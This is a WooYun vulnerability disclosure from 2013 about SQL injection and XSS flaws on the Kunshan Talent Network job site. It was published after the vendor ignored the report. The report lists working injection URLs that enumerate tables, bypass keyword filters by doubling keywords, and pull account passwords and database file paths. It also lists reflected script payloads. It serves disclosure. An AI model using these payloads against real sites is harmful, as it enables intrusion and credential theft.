漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-042842
漏洞标题:昆山人才网SQL注入漏洞可获取人才/管理员/企业账号密码等
相关厂商:昆山人才网
漏洞作者: whathoukun
提交时间:2013-11-14 11:46
修复时间:2014-02-12 11:47
公开时间:2014-02-12 11:47
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-11-14: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-02-12: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
SQL注入漏洞,获取人才账号,管理员账号,企业账号
详细说明:
http://www.kshr.com.cn/Person/Per_Search_JobType.aspx?jobtype=1
漏洞网址
http://www.kshr.com.cn/Person/Per_Search_JobType.aspx?jobtype=1'and db_name()>0 获取数据库名字版本,系统运行环境
http://www.kshr.com.cn/Person/Per_Search_JobType.aspx?jobtype=1'and user>0 确认当前的用户权限
http://www.kshr.com.cn/Person/Per_Search_JobType.aspx?jobtype=(seleselectct top 1 quotename(name) from kshrzt.dbo.sysobjects where xtype=0X75 AND name not in (seleselectct top 15 name from kshrzt.dbo.sysobjects where xtype=0X75))
获取表的名称,虽然过滤很多关键字,但是可以通过替换关键字,构造语句
http://www.kshr.com.cn/Person/Per_Search_JobType.aspx?jobtype=(selselectect col_name(object_id('0x6200730074005F00530065006300750072006900740079005F004D0061006E00610067006500'),7))
获取表结构中的字段
http://www.kshr.com.cn/Person/Per_Search_JobType.aspx?jobtype=(selselectect top 1 password from kshrzt..bst_Company_Acccountount where password not in(selselectect top 2 password from kshrzt..bst_Company_Acccountount)) 获取账号密码
http://www.kshr.com.cn/Person/Per_Search_JobType.aspx?jobtype= (seselectlect top 1 filename from mamasterster..sysdatabases where filename not in (selselectect top 4 filename from mamasterster..sysdatabases ))获取数据库文件所在路径
另外网站还有XSS跨站漏洞
http://www.kshr.cn/Person/JobSeek.aspx?class=A&<script>alert('sdf')</script> 跨站
http://www.kshr.cn/Person/JobSeek.aspx?Class=A&PageNo=2<script>alert('sdf')</script>
http://www.kshr.cn/Online/Per_Select_Place.aspx?jobtype=1000'<script>alert('sdf')</script>
还有一处IFRAME欺骗漏洞,希望网站管理员可以尽快修补,本人偶做测试,没提权,没脱裤,不要被查水表,不要被跨省,有礼物就送个礼物,没礼物就算了
漏洞证明:
图不贴了
修复方案:
设计者比我懂~
版权声明:转载请注明来源 whathoukun@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝